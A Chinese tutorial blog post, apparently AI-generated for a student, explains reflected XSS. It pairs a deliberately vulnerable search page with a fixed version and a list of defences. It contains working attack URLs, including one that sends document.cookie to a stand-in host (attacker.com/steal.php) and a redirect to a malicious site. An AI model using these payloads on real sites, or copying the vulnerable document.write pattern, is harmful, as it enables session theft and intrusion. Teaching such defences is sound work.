ZBLOG

注册 原创投稿

给一个简单的 html XSS漏洞反射形漏洞和攻击示例

作者:golang云原生栏目:公开2025-05-16 10:42233

HTML 反射型 XSS 漏洞示例

存在漏洞的 HTML 页面 (vulnerable.html)

<!DOCTYPE html>
<html>
<head>
    <title>搜索页面</title>
</head>
<body>
    <h1>搜索功能</h1>
    
    <!-- 存在XSS漏洞的搜索框 -->
    <form action="" method="GET">
        <input type="text" name="query" placeholder="输入搜索内容">
        <button type="submit">搜索</button>
    </form>

    <!-- 未经过滤直接输出用户输入 -->
    <div id="results">
        您搜索的内容是: 
        <script>
            // 从URL参数获取查询内容并直接显示
            const params = new URLSearchParams(window.location.search);
            document.write(params.get('query') || '');
        </script>
    </div>
</body>
</html>

攻击示例

正常请求

http://example.com/vulnerable.html?query=手机

页面会显示:您搜索的内容是: 手机

XSS攻击请求

  1. 简单弹窗攻击
http://example.com/vulnerable.html?query=<script>alert('XSS攻击!')</script>
  1. 窃取Cookie
http://example.com/vulnerable.html?query=<script>new Image().src='http://attacker.com/steal.php?cookie='+document.cookie;</script>
  1. 重定向到恶意网站
http://example.com/vulnerable.html?query=<script>window.location.href='http://malicious-site.com'</script>

修复方案

<!DOCTYPE html>
<html>
<head>
    <title>安全的搜索页面</title>
</head>
<body>
    <h1>搜索功能</h1>

    <!-- Content Security Policy (CSP)头 -->
    <meta http-equiv="Content-Security-Policy" content="default-src 'self'">

    <form action="" method="GET">
        <input type="text" name="query" placeholder="输入搜索内容">
        <button type="submit">搜索</button></form>

    <!-- 安全地输出用户输入 -->
    <div id="results">
        您搜索的内容是: 
        <span id="safe-output"></span></div>

    <!-- 使用textContent而不是innerHTML或document.write -->
    <script nonce="随机值">
        const params = new URLSearchParams(window.location.search);
        document.getElementById('safe-output').textContent = params.get('query') || '';
        
        // DOM XSS防护 - JavaScript编码
        function encodeForJS(str) {
            return str.replace(/\\/g, '\\\\')
                     .replace(/'/g, "\\'")
                     .replace(/"/g, '\\"')
                     .replace(/`/g, '\\`');
        }
        
        // HTML实体编码函数
        function encodeForHTML(str) {
            return str.replace(/&/g, '&amp;')
                     .replace(/</g, '&lt;')
                     .replace(/>/g, '&gt;')
                     .replace(/"/g, '&quot;')
                     .replace(/'/g, '&#39;');
        }
        
        // URL编码函数
        function encodeForURL(str) {
            return encodeURIComponent(str);
        }
        
      </script></body></html>

防御措施总结:

  1. 对输出进行编码:使用 textContent 而不是 innerHTML
  2. 实施CSP策略:限制脚本执行来源
  3. 使用nonce属性:只允许特定脚本执行
  4. 设置HttpOnly Cookie:防止通过JavaScript访问敏感Cookie


    内容由零声教学AI助手提供,问题来源于学员提问

本站部分文章来源于网络,版权归原作者所有,如有侵权请联系站长删除。
转载请注明出处:https://golang.0voice.com/?id=23139

golang云原生 golang云原生 管理员
分享:
扫描分享到社交APP
上一篇
下一篇

相关推荐

发表列表
游客 游客
此处应有掌声~
评论列表

还没有评论,快来说点什么吧~

golang云原生

golang云原生

  • 24289文章
  • 0评论
  • 2粉丝
  • 0被赞
最近发布
热门排行
热评文章
猜您喜欢
热门标签
Copyright ©2022    湖南零声信息科技有限公司    版权所有     湘ICP备18009867号-1          证照中心 

联系我们

在线咨询: 点击这里给我发消息

微信号:3007537140

上班时间: 10:30-22:30

关注我们
x

注册

已经有帐号?
简单注册快人一步